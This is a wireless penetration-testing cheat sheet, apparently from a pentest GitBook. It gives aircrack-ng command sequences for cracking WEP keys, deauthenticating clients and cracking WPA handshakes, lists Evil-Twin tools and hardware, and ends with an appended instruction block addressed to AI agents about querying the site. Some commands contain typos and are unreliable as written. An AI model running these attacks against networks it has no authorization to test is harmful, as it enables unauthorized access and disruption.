# Wireless pentest

## Open network

* Usually for guest access and only for internet
* The guest can access it directly or they need to authenticate through a portal

## WEP

* This protocol has been completely broken for many years and should not be used anymore.
* We can find the key very easily

```bash
# Capture around 30 000 IV (maybe more)
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w [OUTPUTFILENAME] wlan0mon
# Generate ARP traffic
aireplay-ng -3 -b 00::09:58:6F:64:1E -h 44:60:57:c8:58:A0 wlan0mon
# Monitor the number of IV with
Aircrack out.cap
# Break the key
Aircrack out.cap
```

## WPA

* 2 authentication modes :
  * Personal = WPA PSK (Pre-Shared Key) = authentification by a secret shared with everyone (like at home)
  * Enterprise = WPA MGT (Management) = EAP (Extensible Authentication Protocol). It is possible to use several different EAP methods (see the official list on the IANA website) but here are the most common versions:
    * PEAP : historically the only protocol supported by Windows, transmits the credentials of the AD via an MSCHAPv2, thus allowing to recover a NetNTLMv2 hash through the Evil-Twin attack.
    * EAP-TTLS : very similar, can authenticate via login/password which can be recovered via the Evil-Twin attack if the clients do not check the certifcat of the access point.
    * EAP-TLS : mutual authentication by certificate.

### The Hacking process

![image](https://user-images.githubusercontent.com/96747355/176039405-619013ff-b308-4ae9-8fcc-80678c51e275.png)

> *Source:* [*Practical Ethical Hacking - TCM Security*](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)

```bash
# check if the wireless card is detected
iwconfig
# shut card if necessary
ifconfig wlan0 down
# kill all interference
airmon-ng check kill
# put the card in monitor mode
iwconfig wlan0 mode monitor
# relaunch it
ifconfig wlan0 up
```

#### OR

```bash
# check if the wireless card is detected
iwconfig
# kill all interference
airmon-ng check kill
# put card in monitor mode
airmon-ng start wlan0
# check if it worked
iwconfig
# Find the ssid in our scope for the test
airodump-ng wlan0mon
# monitor our target for handshakes. For -c we need to specify the channel number found with the previous command and for the bssid option we need the mac address we also found with the previous command
airodump-ng -c <channel-number> --bbsid <MAC-ADDRESS> -w outfile 
# sending deauth
airplay-ng -0 1 -a <MAC-ADDRESS> -c <MAC-ADDRESS-STATION> wlanmon0
# check our capture .ap file to crack the handshake
ls capture*
# crack the handshake with a wordlist
aircrack-ng -w wordlist -b <MAC-ADDRESS> capture-NN.cap 
```

## Tools

* [Wifite](https://github.com/derv82/wifite2)
* [Fluxion](https://github.com/FluxionNetwork/fluxion)
* [EAPHammer](https://github.com/s0lst1c3/eaphammer)

## Equipment

* The following are equipment that can be used for wifi pentest
  * Wireless card Alfa AWUD036NH
  * Alfa AWUS1900
  * Alfa AWUS036ACH
  * Alfa AWUS052NH
  * Alfa AWUS051NH
  * Alfa AWUS036NHR
  * TP-Link TL-WN722N
  * Hak5 Pineapple Nano Basic
  * Flipper Zero along with the wifi dev board

## Resources

{% embed url="<https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet/>" %}
Wireless pentest checklist
{% endembed %}

{% embed url="<https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/>" %}
PWNING WPA/WPA2 NETWORKS WITH BETTERCAP AND THE PMKID CLIENT-LESS ATTACK - on evilsocket
{% endembed %}

{% embed url="<https://www.aircrack-ng.org/doku.php?id=cracking_wpa>" %}
How to Crack WPA/WPA2
{% endembed %}

{% embed url="<https://www.wirelesshack.org/>" %}
WirelesSHack
{% endembed %}

{% embed url="<https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course>" %}
Practical Ethical Hacking - TCM Security
{% endembed %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://csbygb.gitbook.io/pentips/wireless-pentest/wireless.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.